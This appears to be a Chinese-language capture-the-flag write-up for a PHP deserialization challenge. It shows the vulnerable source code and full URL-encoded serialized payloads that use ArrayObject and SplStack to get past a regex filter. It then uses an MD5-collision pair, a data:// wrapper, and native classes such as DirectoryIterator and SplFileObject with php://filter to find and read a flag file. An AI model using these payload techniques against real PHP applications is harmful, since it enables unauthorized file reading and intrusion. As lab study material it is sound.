preg_match("/^[Oa]:[\d]+/i";
正则绕过,最开始用+号绕不过,
$a = new ArrayObject;
$a->a = new Me;
首先要读出key.php内容,
/key.php?a=PHP_SELF&user=C%3A8%3A%22SplStack%22%3A211%3A%7Bi%3A6%3B%3AO%3A7%3A%22useless%22%3A3%3A%7Bs%3A15%3A%22%00useless%00seeyou%22%3BN%3Bs%3A2%3A%22QW%22%3Bs%3A64%3A%22M%C9h%FF%0E%E3%5C+%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2%22%3Bs%3A3%3A%22YXX%22%3Bs%3A64%3A%22M%C9h%FF%0E%E3%5C+%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2%22%3B%7D%7D
key.php读出来要查看源文件才显示,是base64编码,在线转成图片,得到hername和key的值,后面第二步要用到
找POP链进入利用点: new $_POST['ctf']($_GET['fun']);
然后就是利用原生类进行找flag文件和读flag文件
<?php
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
#show_source(__FILE__);
include('key.php');
include('waf.php');
class Me {
public $qwe;
public $bro;
public $secret;
public function __wakeup() {
echo("进来啦<br>");
$characters = 'abcdefghijklmnopqrstuvwxyz0123456789';
$randomString = substr(str_shuffle($characters), 0, 6);
$this->secret=$randomString;
if($this->bro===$this->secret){
$bb = $this->qwe;
return $bb();
}
else{
echo("错了哥们,再试试吧<br>");
}
}
}
class her{
private $hername='momo';
private $key=9;
public $asd;
public function __invoke() {
echo("好累,好想睡一觉啊<br>");
serialize($this->asd);
}
public function find() {
echo("你能找到加密用的key和她的名字吗?qwq<br>");
if (encode($this->hername,$this->key) === 'vxvx') {
echo("解密成功!<br>");
$file=$_GET['file'];
if (isset($file) && (file_get_contents($file,'r') === "loveyou"))
{
echo("快点的,急急急!!!<br>");
echo new $_POST['ctf']($_GET['fun']);
}
else{
echo("真的只差一步了!<br>");
}
}
else{
echo("兄弟怎么搞的?<br>");
}
}
}
class important{
public $power;
/* public function __sleep() {
echo("睡饱了,接着找!<br>");
return $this->power->seeyou;
} */
}
class useless {
private $seeyou;
public $QW;
public $YXX;
public function __construct() {
$this->QW=new her;
$this->seeyou = array('seeyou'=>[$this->QW,'find']);
}
/* public function __destruct() {
$characters = '0123456789';
$random = substr(str_shuffle($characters), 0, 6);
if (!preg_match('/key\.php\/*$/i', $_SERVER['REQUEST_URI'])){
if((strlen($this->QW))<80 && strlen($this->YXX)<80){
$bool=!is_array($this->QW)&&!is_array($this->YXX)&&(md5($this->QW) === md5($this->YXX)) && ($this->QW != $this->YXX) and $random==='newbee';
if($bool){
echo("快拿到我的小秘密了<br>");
$a = isset($_GET['a'])? $_GET['a']: "" ;
if(!preg_match('/HTTP/i', $a)){
echo (basename($_SERVER[$a]));
echo ('<br>');
if(basename($_SERVER[$a])==='key.php'){
echo("找到了!但好像不能直接使用,怎么办,我好想她<br>");
$file = "key.php";
readfile($file);
}
}
else{
echo("你别这样,她会生气的┭┮﹏┭┮");
}
}
}
else{
echo("就这点能耐?怎么帮我找到她(╥╯^╰╥)<br>");
}
}
} */
public function __get($good) {
echo "you are good,你快找到我爱的那个她了<br>";
$zhui = $this->$good;
$zhui[$good]();
}
}
if (isset($_GET['user'])) {
$user = $_GET['user'];
if (!preg_match("/^[Oa]:[\d]+/i", $user)) {
unserialize($user);
}
else {
echo("不是吧,第一层都绕不过去???<br>");
}
}
else {
echo("快帮我找找她!<br>");
}
$a = new ArrayObject;
$a->a = new Me;
$a->a->bro=&$a->a->secret;
$a->a->qwe=new her;
$a->a->qwe->asd=new important;
$a->a->qwe->asd->power=new useless;
$a->a->qwe->asd->power->QW=new her;
echo serialize($a);
echo '<br><br>';
echo urlencode(serialize($a));
?>
POST:ctf=DirectoryIterator:GET:fun=glob://f* 时可得到文件名flag文件名:flag_my_baby.php
GET:?user=C%3A11%3A%22ArrayObject%22%3A446%3A%7Bx%3Ai%3A0%3Ba%3A0%3A%7B%7D%3Bm%3Aa%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A2%3A%22Me%22%3A3%3A%7Bs%3A3%3A%22qwe%22%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bi%3A9%3Bs%3A3%3A%22asd%22%3BO%3A9%3A%22important%22%3A1%3A%7Bs%3A5%3A%22power%22%3BO%3A7%3A%22useless%22%3A3%3A%7Bs%3A15%3A%22%00useless%00seeyou%22%3Ba%3A1%3A%7Bs%3A6%3A%22seeyou%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bi%3A9%3Bs%3A3%3A%22asd%22%3BN%3B%7Di%3A1%3Bs%3A4%3A%22find%22%3B%7D%7Ds%3A2%3A%22QW%22%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bi%3A9%3Bs%3A3%3A%22asd%22%3BN%3B%7Ds%3A3%3A%22YXX%22%3BN%3B%7D%7D%7Ds%3A3%3A%22bro%22%3BN%3Bs%3A6%3A%22secret%22%3BR%3A23%3B%7D%7D%7D&file=data://text/plain,loveyou&fun=glob://f*
POST:ctf=DirectoryIterator
POST:ctf=SplFileObject;GET:fun=fun=php://filter/read=convert.base64-encode/resource=flag_my_baby.php
这里要用php伪协议读才能读全部文件内容,不然光用文件名只能读一行
/havefun.php?user=C%3A11%3A%22ArrayObject%22%3A446%3A%7Bx%3Ai%3A0%3Ba%3A0%3A%7B%7D%3Bm%3Aa%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A2%3A%22Me%22%3A3%3A%7Bs%3A3%3A%22qwe%22%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bi%3A9%3Bs%3A3%3A%22asd%22%3BO%3A9%3A%22important%22%3A1%3A%7Bs%3A5%3A%22power%22%3BO%3A7%3A%22useless%22%3A3%3A%7Bs%3A15%3A%22%00useless%00seeyou%22%3Ba%3A1%3A%7Bs%3A6%3A%22seeyou%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bi%3A9%3Bs%3A3%3A%22asd%22%3BN%3B%7Di%3A1%3Bs%3A4%3A%22find%22%3B%7D%7Ds%3A2%3A%22QW%22%3BO%3A3%3A%22her%22%3A3%3A%7Bs%3A12%3A%22%00her%00hername%22%3Bs%3A4%3A%22momo%22%3Bs%3A8%3A%22%00her%00key%22%3Bi%3A9%3Bs%3A3%3A%22asd%22%3BN%3B%7Ds%3A3%3A%22YXX%22%3BN%3B%7D%7D%7Ds%3A3%3A%22bro%22%3BN%3Bs%3A6%3A%22secret%22%3BR%3A23%3B%7D%7D%7D&file=data://text/plain,loveyou&fun=php://filter/read=convert.base64-encode/resource=flag_my_baby.php
POST:ctf=SplFileObject
最终得到flag
最好发现直接访问flag_my_baby.php就可以出flag